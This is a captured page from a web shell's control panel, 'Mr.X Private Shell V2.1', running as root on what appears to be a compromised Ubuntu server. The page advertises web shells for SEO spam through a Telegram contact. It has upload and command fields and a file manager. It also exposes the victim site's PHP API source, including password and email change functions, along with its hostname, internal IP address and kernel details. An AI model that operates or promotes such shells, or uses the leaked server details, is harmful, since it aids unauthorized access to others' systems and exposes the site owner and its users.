__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Upload:
Command:
<?php /** * @author Prasetyo Pandu <prasetyowira@gmail.com> * Date: 23/10/17 * Time: 12.10 */ namespace Api; require_once 'BaseClass.php'; define( 'BLOCK_LOAD', true ); ini_set('display_errors','on'); use Api\Helpers\Response; class Profile extends BaseClass { use Response; public function __construct() { parent::__construct(); $this->table = 'milna_users'; $this->table_profile = 'milna_user_profile'; $this->table_anak = 'milna_data_anak'; } function changePasswordProfile($input){ if (!is_user_logged_in()){ return $this->json_response('Not Authorize',[],403); } $user = get_user_by_email($input['email']); if ( $user && wp_check_password( $input['old_password'], $user->data->user_pass, $user->ID ) ) { wp_set_password($input['new_password'], $user->ID); return $this->json_response('Success', [], 201); } else { return $this->json_response('Password not found', [], 200); } } function changeEmail($input){ if (!is_user_logged_in()){ return $this->json_response('Not Authorize',[],403); } $user = get_user_by_email($input['current_email']); $userdata['ID'] = $user->ID; $userdata['user_email'] = $input['new_email']; if(wp_update_user( $userdata )){ return $this->json_response('Success', [], 201); }else{ return $this->json_response('Internal Server Error', [], 500); } } }
Filemanager
Name | Type | Size | Permission | Actions |
---|---|---|---|---|
Helpers | Folder | 0777 |
|
|
Tools | Folder | 0777 |
|
|
Anak.php | File | 5.67 KB | 0666 |
|
Anak.phpbakup | File | 5.66 KB | 0666 |
|
Autoloader.php | File | 840 B | 0666 |
|
BaseClass.php | File | 4.49 KB | 0666 |
|
Profile.php | File | 1.41 KB | 0666 |
|
User.php | File | 2.44 KB | 0666 |
|
index.php | File | 0 B | 0666 |
|
Server Info
- Hostname: milna-web
- IP Address: 172.31.26.98
- PHP Version: 7.4.33
- Server Software: Apache/2.4.58 (Ubuntu)
- HDD Total Space: 18.33 GB
- HDD Free Space: 2.47 GB
- Total Domains in Server: 2
- System: Linux milna-web 6.8.0-1018-aws #20-Ubuntu SMP Thu Oct 10 18:14:42 UTC 2024 x86_64
System Info
User Info
- Username: root
- User ID: 0
- Group ID: 0
Copyright reserved © 2025 xtooler.online Shell Coded By Mr.X
01
2018